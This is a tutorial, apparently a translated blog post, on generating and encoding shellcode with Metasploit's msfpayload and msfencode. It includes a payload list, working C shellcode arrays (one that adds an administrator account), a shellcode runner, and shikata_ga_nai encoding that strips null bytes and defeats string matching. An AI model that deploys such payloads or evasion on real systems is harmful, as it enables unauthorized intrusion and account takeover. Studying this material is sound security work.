windows/vncinject/bind_tcp Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/bind_tcp_rc4 Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/find_tag Use an established connection, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_http Tunnel communication over HTTP, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ipv6_http Tunnel communication over HTTP and IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ipv6_tcp Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_nonx_tcp Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_ord_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_allports Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_rc4 Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/vncinject/reverse_tcp_rc4_dns Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
windows/x64/exec Execute an arbitrary command (Windows x64)
windows/x64/loadlibrary Load an arbitrary x64 library path
windows/x64/meterpreter/bind_tcp Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/meterpreter/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/meterpreter/reverse_tcp Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
windows/x64/shell/bind_tcp Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_tcp Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_https Tunnel communication over HTTP using SSL (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
To test a shellcode that pops up a dialog box, use the payload windows/messagebox; the S option shows its detailed configuration:
root@bt:~# msfpayload windows/messagebox S
Name: Windows MessageBox
Module: payload/windows/messagebox
Version: 0
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 270
Rank: Normal
Provided by:
corelanc0d3r <peter.ve@corelan.be>
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
ICON NO yes Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION
TEXT Hello, from MSF! yes Messagebox Text (max 255 chars)
TITLE MessageBox yes Messagebox Title (max 255 chars)
Description:
Spawns a dialog via MessageBox using a customizable title, text &
icon
msf can emit the shellcode in several language formats; here we generate the C format with the following command:
root@bt:~# msfpayload windows/messagebox C
/*
 * windows/messagebox - 270 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
 * TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
 */
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58"
"\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89"
"\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
Use a C program to check that the generated shellcode actually works; the code is as follows:
/*
* windows/messagebox - 270 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
* TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
*/
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58"
"\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20\x68\x6f"
"\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9\x88\x4c\x24\x10\x89"
"\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
int main(int argc, char* argv[])
{
__asm {
lea eax, buf //get the address of buf
push eax //push that address onto the stack
ret //"return" to it, i.e. jump into the shellcode
}
return 0;
}
Check the result of running it:
The title looks ugly; how do we change what is displayed? The payload options can be set on the command line:
root@bt:~# msfpayload windows/messagebox TITLE=Hello TEXT=World C
/*
 * windows/messagebox - 250 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
 * TITLE=Hello, TEXT=World, ICON=NO
 */
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56"
"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52"
"\xe8\x61\xff\xff\xff\x68\x6f\x58\x20\x20\x68\x48\x65\x6c\x6c"
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x64\x58\x20\x20\x68\x57"
"\x6f\x72\x6c\x31\xc9\x88\x4c\x24\x05\x89\xe1\x31\xd2\x52\x53"
"\x51\x52\xff\xd0\x31\xc0\x50\xff\x55\x08";
Test it the same way as above:

The change worked!
To generate the payload as a directly runnable executable, use the X option:
root@bt:~# msfpayload windows/messagebox X > messagebox.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/messagebox
Length: 270
Options: {}
root@bt:~# file messagebox.exe
messagebox.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Generate a Linux executable that runs a command:
root@bt:~# msfpayload linux/x86/exec CMD=whoami X > whoami
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/exec
Length: 42
Options: {"CMD"=>"whoami"}
root@bt:~# file whoami
whoami: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
root@bt:~# ./whoami
bash: ./whoami: Permission denied
root@bt:~# chmod +x whoami
root@bt:~# ./whoami
root
Generate a shellcode that adds an account; the account is USER=metasploit, PASS=Metasploit$1:
root@bt:~# msfpayload windows/adduser C
/*
 * windows/adduser - 289 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
 * USER=metasploit, PASS=Metasploit$1, CUSTOM=, WMIC=false,
 * COMPLEXITY=true
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x4d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x24\x31\x20\x2f\x41\x44\x44\x20"
"\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f"
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f"
"\x72\x73\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f"
"\x41\x44\x44\x00";
It runs successfully. But the buffer contains 00 bytes, so it cannot be copied intact as a C string (the first null terminates it). The output therefore has to be encoded with msfencode.
Shellcode encoding
Encoding with msfencode
View the help information:
root@bt:~# msfencode -h
Usage: /opt/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,csharp,js_be,js_le,java,python,py,dll,exe,exe-small,exe-only,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v Increase verbosity
-x <opt> Specify an alternate executable template
List the supported encoders:
root@bt:~# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 Encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/add_sub manual Add/Sub Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
Encode the generated shellcode:
root@bt:~# msfpayload windows/adduser R | msfencode -a x86 -e x86/shikata_ga_nai -t c -b "\x00"
[*] x86/shikata_ga_nai succeeded with size 316 (iteration=1)
unsigned char buf[] =
"\xda\xca\xb8\xdf\x87\xb0\x47\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x49\x31\x43\x18\x03\x43\x18\x83\xeb\x23\x65\x45\xbb\x33\xe3"
"\xa6\x44\xc3\x94\x2f\xa1\xf2\x86\x54\xa1\xa6\x16\x1e\xe7\x4a"
"\xdc\x72\x1c\xd9\x90\x5a\x13\x6a\x1e\xbd\x1a\x6b\xae\x01\xf0"
"\xaf\xb0\xfd\x0b\xe3\x12\x3f\xc4\xf6\x53\x78\x39\xf8\x06\xd1"
"\x35\xaa\xb6\x56\x0b\x76\xb6\xb8\x07\xc6\xc0\xbd\xd8\xb2\x7a"
"\xbf\x08\x6a\xf0\xf7\xb0\x01\x5e\x28\xc0\xc6\xbc\x14\x8b\x63"
"\x76\xee\x0a\xa5\x46\x0f\x3d\x89\x05\x2e\xf1\x04\x57\x76\x36"
"\xf6\x22\x8c\x44\x8b\x34\x57\x36\x57\xb0\x4a\x90\x1c\x62\xaf"
"\x20\xf1\xf5\x24\x2e\xbe\x72\x62\x33\x41\x56\x18\x4f\xca\x59"
"\xcf\xd9\x88\x7d\xcb\x82\x4b\x1f\x4a\x6f\x3a\x20\x8c\xd7\xe3"
"\x84\xc6\xfa\xf0\xbf\x84\x90\x07\x4d\xb3\xdc\x07\x4d\xbc\x4e"
"\x6f\x7c\x37\x01\xe8\x81\x92\x65\x06\xc8\xbf\xcc\x8e\x95\x55"
"\x4d\xd3\x25\x80\x92\xed\xa5\x21\x6b\x0a\xb5\x43\x6e\x57\x71"
"\xbf\x02\xc8\x14\xbf\xb1\xe9\x3c\xdc\x58\x71\x91\x46\xdb\x1c"
"\xcd\xa7\x78\xfe\x63\xdd\x0a\xde\x0e\x6e\x96\x6c\xd1\xfd\x3d"
"\xe4\x70\x8d\xcd\x68\x1c\x18\x5a\x50\xaf\xbf\xd6\xf1\x5c\x30"
"\x7b\x9e\xcb\xc4\xa7\x51\x2c\x0a\xe9\xd5\x68\x74\xcf\xf3\x50"
"\x1a\x6a\x8f\xb0\x8e\x1b\x0c\xd0\x22\x83\xa0\x7d\xce\x3b\x64"
"\xc3\x54\xd1\x0d\xad\xfd\x5a\xb9\x43\x9f\xe8\x2e\xd6\x2c\x31"
"\xdd\x73\xa7\x50\x6e\x0c\x2b\xfc\xf9\x98\x93\x2d\xb8\x24\x90"
"\x31";
After encoding, the string no longer contains any 00 bytes. Testing another encoder:
root@bt:~# msfpayload windows/adduser R | msfencode -a x86 -e x86/alpha_mixed -t c -b "\x00"
[*] x86/alpha_mixed succeeded with size 640 (iteration=1)
unsigned char buf[] =
"\x89\xe6\xda\xce\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x58\x68\x4c\x49\x45\x50\x43\x30\x63\x30\x63\x50\x6c"
"\x49\x69\x75\x65\x61\x49\x42\x51\x74\x4c\x4b\x72\x72\x36\x50"
"\x4e\x6b\x31\x42\x76\x6c\x4e\x6b\x62\x72\x37\x64\x4e\x6b\x71"
"\x62\x31\x38\x74\x4f\x38\x37\x32\x6a\x75\x76\x46\x51\x49\x6f"
"\x76\x51\x4b\x70\x4c\x6c\x75\x6c\x51\x71\x43\x4c\x36\x62\x66"
"\x4c\x31\x30\x79\x51\x4a\x6f\x66\x6d\x53\x31\x39\x57\x38\x62"
"\x38\x70\x36\x32\x46\x37\x6c\x4b\x72\x72\x56\x70\x4c\x4b\x47"
"\x32\x57\x4c\x33\x31\x4a\x70\x4e\x6b\x43\x70\x70\x78\x4c\x45"
"\x4f\x30\x73\x44\x53\x7a\x76\x61\x4e\x30\x36\x30\x4c\x4b\x52"
"\x68\x57\x68\x4c\x4b\x66\x38\x77\x50\x47\x71\x5a\x73\x38\x63"
"\x77\x4c\x32\x69\x6c\x4b\x37\x44\x6c\x4b\x65\x51\x7a\x76\x75"
"\x61\x49\x6f\x64\x71\x39\x50\x6e\x4c\x79\x51\x48\x4f\x34\x4d"
"\x66\x61\x68\x47\x37\x48\x6d\x30\x63\x45\x79\x64\x33\x33\x51"
"\x6d\x68\x78\x77\x4b\x61\x6d\x55\x74\x52\x55\x4b\x52\x62\x78"
"\x4c\x4b\x33\x68\x31\x34\x43\x31\x39\x43\x72\x46\x4c\x4b\x34"
"\x4c\x70\x4b\x4c\x4b\x61\x48\x45\x4c\x45\x51\x6b\x63\x6c\x4b"
"\x46\x64\x6e\x6b\x66\x61\x78\x50\x6d\x59\x73\x74\x71\x34\x56"
"\x44\x43\x6b\x73\x6b\x73\x51\x66\x39\x71\x4a\x42\x71\x49\x6f"
"\x59\x70\x61\x48\x63\x6f\x31\x4a\x4c\x4b\x52\x32\x78\x6b\x4c"
"\x46\x61\x4d\x50\x6a\x76\x61\x6c\x4d\x4d\x55\x58\x39\x75\x50"
"\x45\x50\x75\x50\x42\x70\x72\x48\x70\x31\x6c\x4b\x72\x4f\x4f"
"\x77\x4b\x4f\x79\x45\x6f\x4b\x4a\x50\x6e\x55\x59\x32\x56\x36"
"\x70\x68\x6f\x56\x5a\x35\x4d\x6d\x6d\x4d\x39\x6f\x48\x55\x47"
"\x4c\x66\x66\x31\x6c\x74\x4a\x6d\x50\x39\x6b\x59\x70\x72\x55"
"\x75\x55\x4d\x6b\x67\x37\x37\x63\x32\x52\x32\x4f\x73\x5a\x33"
"\x30\x51\x43\x79\x6f\x59\x45\x33\x53\x32\x4d\x55\x34\x64\x6e"
"\x62\x45\x71\x68\x61\x75\x37\x50\x36\x4f\x31\x73\x47\x50\x62"
"\x4e\x75\x35\x52\x54\x31\x30\x70\x75\x61\x63\x33\x55\x50\x72"
"\x45\x70\x30\x6d\x51\x75\x73\x44\x71\x71\x42\x53\x32\x50\x70"
"\x6c\x72\x4f\x61\x79\x44\x34\x67\x50\x70\x4d\x33\x55\x73\x44"
"\x30\x61\x64\x33\x44\x30\x32\x4c\x70\x6f\x65\x39\x63\x44\x35"
"\x74\x74\x71\x65\x70\x64\x6f\x31\x51\x42\x64\x71\x54\x37\x50"
"\x55\x76\x64\x66\x65\x70\x32\x4e\x35\x35\x63\x44\x67\x50\x30"
"\x6c\x62\x4f\x72\x43\x75\x31\x30\x6c\x61\x77\x73\x42\x32\x4f"
"\x72\x55\x62\x50\x37\x50\x33\x71\x75\x34\x52\x4d\x61\x79\x30"
"\x6e\x61\x79\x70\x73\x44\x34\x64\x32\x70\x61\x52\x54\x62\x4f"
"\x30\x72\x72\x53\x67\x50\x72\x4d\x51\x75\x51\x64\x55\x31\x32"
"\x53\x54\x30\x32\x4c\x62\x4f\x61\x79\x31\x64\x67\x50\x66\x4f"
"\x62\x61\x73\x74\x63\x74\x35\x50\x41\x41";
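The two points this section turns on, the 00 bytes that make the raw adduser buffer unusable as a C string and their absence after msfencode -b "\x00", can be checked without running anything. The following C checker is an added example (not from the original post or from Metasploit): it counts bytes from an avoid set and runs a strings(1)-style scan, which recovers the plaintext command tail from a raw buffer but finds nothing in the encoded one, the reason a simple string match on the command no longer detects the encoded payload. The raw sample is a constructed fragment modelled on the adduser tail, and the encoded sample is the first 15 bytes of the shikata_ga_nai output shown above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count the bytes of buf that fall in the "avoid" set: the check behind
 * msfencode -b "\x00". A raw payload containing 0x00 is truncated as
 * soon as it is handled as a C string. */
size_t count_bad_bytes(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { hits++; break; }
    return hits;
}

/* strings(1)-style scan: longest run of printable ASCII of at least
 * min_run bytes; copied to out (NUL-terminated), length returned, 0 if none. */
size_t longest_printable_run(const unsigned char *buf, size_t len,
                             size_t min_run, char *out, size_t outsz)
{
    size_t best = 0, best_start = 0, run = 0;
    for (size_t i = 0; i <= len; i++) {
        if (i < len && isprint(buf[i])) { run++; continue; }
        if (run >= min_run && run > best) { best = run; best_start = i - run; }
        run = 0;
    }
    if (outsz == 0) return best;
    size_t n = best < outsz ? best : outsz - 1;
    memcpy(out, buf + best_start, n);
    out[n] = '\0';
    return best;
}

/* Constructed sample (not real msfpayload output): five opcode bytes with a
 * 0x00 inside, then a plaintext command tail like the raw adduser buffer has. */
static const unsigned char raw_sample[] = "\x6a\x00\x53\xff\xd5" "cmd.exe /c whoami";
#define RAW_LEN (sizeof raw_sample - 1)
/* First 15 bytes of the x86/shikata_ga_nai output shown above. */
static const unsigned char encoded_sample[] =
    "\xda\xca\xb8\xdf\x87\xb0\x47\xd9\x74\x24\xf4\x5b\x33\xc9\xb1";
#define ENC_LEN (sizeof encoded_sample - 1)
static const unsigned char avoid[] = { 0x00 };   /* the -b "\x00" set */

int main(void)
{
    char s[64];
    size_t nulls = count_bad_bytes(raw_sample, RAW_LEN, avoid, sizeof avoid);
    size_t run = longest_printable_run(raw_sample, RAW_LEN, 4, s, sizeof s);
    printf("raw:     %zu null byte(s), longest string (%zu): \"%s\"\n", nulls, run, s);
    nulls = count_bad_bytes(encoded_sample, ENC_LEN, avoid, sizeof avoid);
    run = longest_printable_run(encoded_sample, ENC_LEN, 4, s, sizeof s);
    printf("encoded: %zu null byte(s), longest string (%zu): \"%s\"\n", nulls, run, s);
    return 0;
}
```

To check a full msfencode run, paste the emitted buf[] in place of the two samples; the same avoid set can be extended to whatever -b list was used.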
References:
http://www.programlife.net/shellcode-test-template.html